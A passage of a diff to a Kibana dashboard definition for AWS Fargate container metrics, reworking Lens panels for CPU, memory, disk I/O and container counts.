"lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a" + } + ], + "state": { + "visualization": { + "columns": [ { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" + "columnId": "eb452b61-bf12-46c0-afae-c0f1c776156c", + "width": 206.5666666666667, + "isTransposed": false, + "isMetric": false }, { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { - "columnOrder": [ - "040803fd-23f9-4f4f-95da-e8be99becbc1", - "eb452b61-bf12-46c0-afae-c0f1c776156c", - "b1e08425-6a1e-4db6-bb47-a65167b7e14f", - "09de0d9e-c174-46cf-bdc8-50158475b4a7", - "e0782143-0636-43b4-8fac-b857ea5282b2", - "7626706b-6efa-4fe7-b45c-6e9afa07f982", - "441ceb32-53e7-4408-9638-6dfd38202144" - ], - "columns": { - "040803fd-23f9-4f4f-95da-e8be99becbc1": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Task Name", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.labels.com_amazonaws_ecs_task-definition-family" - }, - "09de0d9e-c174-46cf-bdc8-50158475b4a7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - }, - "441ceb32-53e7-4408-9638-6dfd38202144": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.pct" - }, - "7626706b-6efa-4fe7-b45c-6e9afa07f982": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.total" - }, - "b1e08425-6a1e-4db6-bb47-a65167b7e14f": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "ECS Cluster ARN", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.labels.com_amazonaws_ecs_cluster" - }, - "e0782143-0636-43b4-8fac-b857ea5282b2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO", - "operationType": "average", - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.total" - }, - "eb452b61-bf12-46c0-afae-c0f1c776156c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Container Name", - "operationType": "terms", - "params": { - "orderBy": { - "type": "alphabetical" - }, - "orderDirection": "asc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "container.name" - } - } - } - } - } + "columnId": "040803fd-23f9-4f4f-95da-e8be99becbc1", + "width": 174.82083333333335 + }, + { + "alignment": "left", + "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7", + "width": 94.35486111111106 }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + { + "alignment": "left", + "columnId": "e0782143-0636-43b4-8fac-b857ea5282b2", + "width": 137.31666666666666 + }, + { + "alignment": "left", + "columnId": "7626706b-6efa-4fe7-b45c-6e9afa07f982", + "width": 145.70972222222224 }, - "visualization": { - "columns": [ - { - "columnId": "eb452b61-bf12-46c0-afae-c0f1c776156c" + { + "columnId": "c3bebf6b-2327-4780-93c5-7eaa5da9e136", + "isTransposed": false, + "isMetric": false, + "width": 167.16666666666663 + }, + { + "columnId": "be5220e6-b8d6-4453-aa6d-c23115fd5a79", + "isTransposed": false, + "isMetric": true, + "width": 150.7097222222222, + "alignment": "left" + }, + { + "columnId": "698193ae-8b08-4c27-ac8d-8db3b79c667f", + "isTransposed": false, + "isMetric": true, + "alignment": "left" + } + ], + "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "layerType": "data", + "rowHeight": "single", + "headerRowHeight": "single", + "rowHeightLines": 1, + "headerRowHeightLines": 1, + "paging": { + "size": 10, + "enabled": false + } + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [], + "datasourceStates": { + "formBased": { + "layers": { + "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { + "columnOrder": [ + "040803fd-23f9-4f4f-95da-e8be99becbc1", + "eb452b61-bf12-46c0-afae-c0f1c776156c", + "c3bebf6b-2327-4780-93c5-7eaa5da9e136", + "09de0d9e-c174-46cf-bdc8-50158475b4a7", + "e0782143-0636-43b4-8fac-b857ea5282b2", + "7626706b-6efa-4fe7-b45c-6e9afa07f982", + "698193ae-8b08-4c27-ac8d-8db3b79c667f", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0", + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1" + ], + "columns": { + "040803fd-23f9-4f4f-95da-e8be99becbc1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Task Name", + "operationType": "terms", + "params": { + "orderBy": { + "type": "alphabetical" + }, + "orderDirection": "asc", + "parentFormat": { + "id": "terms" + }, + "size": 20 }, - { - "columnId": "040803fd-23f9-4f4f-95da-e8be99becbc1" + "scale": "ordinal", + "sourceField": "container.labels.com_amazonaws_ecs_task-definition-family" + }, + "09de0d9e-c174-46cf-bdc8-50158475b4a7": { + "label": "CPU", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct", + "filter": { + "query": "\"awsfargate.task_stats.cpu.total.norm.pct\": *", + "language": "kuery" }, - { - "columnId": "b1e08425-6a1e-4db6-bb47-a65167b7e14f" + "params": { + "sortField": "@timestamp", + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } }, - { - "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7" + "customLabel": true + }, + "7626706b-6efa-4fe7-b45c-6e9afa07f982": { + "label": "Memory Usage", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory.usage.total", + "filter": { + "query": "\"awsfargate.task_stats.memory.usage.total\": *", + "language": "kuery" }, - { - "columnId": "e0782143-0636-43b4-8fac-b857ea5282b2" + "params": { + "sortField": "@timestamp", + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } }, - { - "columnId": "7626706b-6efa-4fe7-b45c-6e9afa07f982" + "customLabel": true + }, + "e0782143-0636-43b4-8fac-b857ea5282b2": { + "label": "DiskIO Write", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.write.bytes", + "filter": { + "query": "\"awsfargate.task_stats.diskio.write.bytes\": *", + "language": "kuery" }, - { - "columnId": "441ceb32-53e7-4408-9638-6dfd38202144" - } - ], - "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } - }, - "title": "Container Table [Metrics AWSFargate]", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "735a25cb-f781-4a8b-99e6-2adf582f8a37", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "735a25cb-f781-4a8b-99e6-2adf582f8a37", - "title": "Containers", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "450490b7-c7f9-42bf-8e7d-227cbf960e94": { - "columnOrder": [ - "b20aebaf-7126-4b1c-acca-79cfa113b44d", - "915eda3d-00ce-40d0-ada8-4eb372202b42" - ], - "columns": { - "915eda3d-00ce-40d0-ada8-4eb372202b42": { - "dataType": "number", - "isBucketed": false, - "label": "Unique count of container.id", - "operationType": "unique_count", - "scale": "ratio", - "sourceField": "container.id" - }, - "b20aebaf-7126-4b1c-acca-79cfa113b44d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - } + "params": { + "sortField": "@timestamp", + "format": { + "id": "bytes", + "params": { + "decimals": 2 } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "915eda3d-00ce-40d0-ada8-4eb372202b42" + } + }, + "customLabel": true + }, + "eb452b61-bf12-46c0-afae-c0f1c776156c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Container Name", + "operationType": "terms", + "params": { + "orderBy": { + "type": "alphabetical" + }, + "orderDirection": "asc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "container.name" + }, + "c3bebf6b-2327-4780-93c5-7eaa5da9e136": { + "label": "Container ID", + "dataType": "string", + "operationType": "terms", + "scale": "ordinal", + "sourceField": "container.id", + "isBucketed": true, + "params": { + "size": 100, + "orderBy": { + "type": "column", + "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7" + }, + "orderDirection": "desc", + "otherBucket": true, + "missingBucket": false, + "parentFormat": { + "id": "terms" + }, + "include": [], + "exclude": [], + "includeIsRegex": false, + "excludeIsRegex": false + }, + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0": { + "label": "Part of Hard Memory Limit", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory_hard_limit", + "filter": { + "query": "\"awsfargate.task_stats.memory_hard_limit\": *", + "language": "kuery" + }, + "params": { + "sortField": "@timestamp" + }, + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1": { + "label": "Part of Hard Memory Limit", + "dataType": "number", + "operationType": "math", + "isBucketed": false, + "scale": "ratio", + "params": { + "tinymathAst": { + "type": "function", + "name": "divide", + "args": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0", + 1024 ], - "layerId": "450490b7-c7f9-42bf-8e7d-227cbf960e94", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "b20aebaf-7126-4b1c-acca-79cfa113b44d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" + "location": { + "min": 0, + "max": 110 + }, + "text": "last_value(awsfargate.task_stats.memory_hard_limit, kql='\"awsfargate.task_stats.memory_hard_limit\": *') / 1024" + } + }, + "references": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0" + ], + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79": { + "label": "Hard Memory Limit", + "dataType": "number", + "operationType": "formula", + "isBucketed": false, + "scale": "ratio", + "params": { + "formula": "last_value(awsfargate.task_stats.memory_hard_limit, kql='\"awsfargate.task_stats.memory_hard_limit\": *') / 1024", + "isFormulaBroken": false, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "GB" + } + } + }, + "references": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1" + ], + "customLabel": true + }, + "698193ae-8b08-4c27-ac8d-8db3b79c667f": { + "label": "Max Memory Usage", + "dataType": "number", + "operationType": "max", + "sourceField": "awsfargate.task_stats.memory.usage.total", + "isBucketed": false, + "scale": "ratio", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "customLabel": true + } }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - } + "incompleteColumns": {} + } } + } }, - "title": "Total Number of Containers [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "internalReferences": [], + "adHocDataViews": {} + } }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Containers" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "5d4537e8-9aee-47e6-8580-1961d8a3a38e", + "i": "e609f80a-d1b2-4820-a896-a8a68a731ed0", "w": 24, "x": 0, "y": 14 - }, - "panelIndex": "5d4537e8-9aee-47e6-8580-1961d8a3a38e", - "title": "Total Number of Containers", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "e609f80a-d1b2-4820-a896-a8a68a731ed0", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0": { - "columnOrder": [ - "e139ccbc-54ff-4921-b345-e3c3ff6a9efc", - "d7b9836e-d606-4aab-b2d8-44cbc726a950" - ], - "columns": { - "d7b9836e-d606-4aab-b2d8-44cbc726a950": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Utilization", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - }, - "e139ccbc-54ff-4921-b345-e3c3ff6a9efc": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster Name", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "d7b9836e-d606-4aab-b2d8-44cbc726a950", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.cluster_name" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "d7b9836e-d606-4aab-b2d8-44cbc726a950" - ], - "layerId": "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", - "layerType": "data", - "seriesType": "bar_horizontal", - "xAccessor": "e139ccbc-54ff-4921-b345-e3c3ff6a9efc" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "450490b7-c7f9-42bf-8e7d-227cbf960e94": { + "columnOrder": [ + "b20aebaf-7126-4b1c-acca-79cfa113b44d", + "915eda3d-00ce-40d0-ada8-4eb372202b42" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" + "columns": { + "915eda3d-00ce-40d0-ada8-4eb372202b42": { + "dataType": "number", + "isBucketed": false, + "label": "Unique count of container.id", + "operationType": "unique_count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "container.id" + }, + "b20aebaf-7126-4b1c-acca-79cfa113b44d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - } + "indexPatternId": "metrics-*" + } } + } }, - "title": "CPU Utilization Per Cluster [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "915eda3d-00ce-40d0-ada8-4eb372202b42" + ], + "layerId": "450490b7-c7f9-42bf-8e7d-227cbf960e94", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "b20aebaf-7126-4b1c-acca-79cfa113b44d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "Total Number of Containers [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Total Number of Containers" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "d3c9208e-c699-4514-a091-a731d28ab9af", + "i": "3607122f-df09-4aa9-b42c-8f58d334e7c8", "w": 24, "x": 24, "y": 14 - }, - "panelIndex": "d3c9208e-c699-4514-a091-a731d28ab9af", - "title": "CPU Utilization Per Cluster", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "3607122f-df09-4aa9-b42c-8f58d334e7c8", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { - "columnOrder": [ - "55121be2-80f6-407c-9352-3e13705ac860", - "eb452b61-bf12-46c0-afae-c0f1c776156c", - "5b846eff-5ca7-45b0-b4c2-0346e9986302" - ], - "columns": { - "55121be2-80f6-407c-9352-3e13705ac860": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b846eff-5ca7-45b0-b4c2-0346e9986302": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Container Memory Usage Pct", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.pct" - }, - "eb452b61-bf12-46c0-afae-c0f1c776156c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "container identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "5b846eff-5ca7-45b0-b4c2-0346e9986302", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "5b846eff-5ca7-45b0-b4c2-0346e9986302" - ], - "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "eb452b61-bf12-46c0-afae-c0f1c776156c", - "xAccessor": "55121be2-80f6-407c-9352-3e13705ac860" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0": { + "columnOrder": [ + "e139ccbc-54ff-4921-b345-e3c3ff6a9efc", + "d7b9836e-d606-4aab-b2d8-44cbc726a950" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "d7b9836e-d606-4aab-b2d8-44cbc726a950": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Utilization", + "operationType": "average", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" + }, + "e139ccbc-54ff-4921-b345-e3c3ff6a9efc": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster Name", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "d7b9836e-d606-4aab-b2d8-44cbc726a950", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.cluster_name" + } } + } } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "Container Memory Usage Pct [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "d7b9836e-d606-4aab-b2d8-44cbc726a950" + ], + "layerId": "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "e139ccbc-54ff-4921-b345-e3c3ff6a9efc" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "CPU Utilization Per Cluster [Metrics AWSFargate]", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "CPU Utilization Per Cluster" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7", + "i": "18d073d9-fbd7-42fd-b157-4721e4c810d7", "w": 24, "x": 0, "y": 29 - }, - "panelIndex": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7", - "title": "Container Memory Usage Pct", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "18d073d9-fbd7-42fd-b157-4721e4c810d7", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0749cbce-4a88-471d-9715-9f4f54510864": { - "columnOrder": [ - "35481ca7-cebb-495c-974f-34ede5f3935c", - "33d4857c-800a-4854-9369-dbf019501bdd", - "ec425562-fe79-4326-b753-20b408c806fb" - ], - "columns": { - "33d4857c-800a-4854-9369-dbf019501bdd": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Container Identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "ec425562-fe79-4326-b753-20b408c806fb", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "35481ca7-cebb-495c-974f-34ede5f3935c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ec425562-fe79-4326-b753-20b408c806fb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Container CPU Total Norm Pct", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "fittingFunction": "None", - "layers": [ - { - "accessors": [ - "ec425562-fe79-4326-b753-20b408c806fb" - ], - "layerId": "0749cbce-4a88-471d-9715-9f4f54510864", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "33d4857c-800a-4854-9369-dbf019501bdd", - "xAccessor": "35481ca7-cebb-495c-974f-34ede5f3935c" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { + "columnOrder": [ + "55121be2-80f6-407c-9352-3e13705ac860", + "eb452b61-bf12-46c0-afae-c0f1c776156c", + "5b846eff-5ca7-45b0-b4c2-0346e9986302" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" + "columns": { + "55121be2-80f6-407c-9352-3e13705ac860": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "5b846eff-5ca7-45b0-b4c2-0346e9986302": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Container Memory Usage", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory.usage.total" + }, + "eb452b61-bf12-46c0-afae-c0f1c776156c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "container identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "5b846eff-5ca7-45b0-b4c2-0346e9986302", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + } }, - "preferredSeriesType": "line" + "indexPatternId": "metrics-*" + } } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "Container CPU Total Norm Pct [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "5b846eff-5ca7-45b0-b4c2-0346e9986302" + ], + "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "eb452b61-bf12-46c0-afae-c0f1c776156c", + "xAccessor": "55121be2-80f6-407c-9352-3e13705ac860" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "Container Memory Usage [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Container Memory Usage" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "a7a6e425-98fd-4210-b3d5-005268be6274", + "i": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612", "w": 24, "x": 24, "y": 29 - }, - "panelIndex": "a7a6e425-98fd-4210-b3d5-005268be6274", - "title": "Container CPU Total Norm Pct", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { - "columnOrder": [ - "0505d890-632e-4434-a68f-f019e7893eaf", - "989ce63a-7fcd-4c83-980b-d595a1dd2469", - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "columns": { - "0505d890-632e-4434-a68f-f019e7893eaf": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of awsfargate.task_stats.identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": 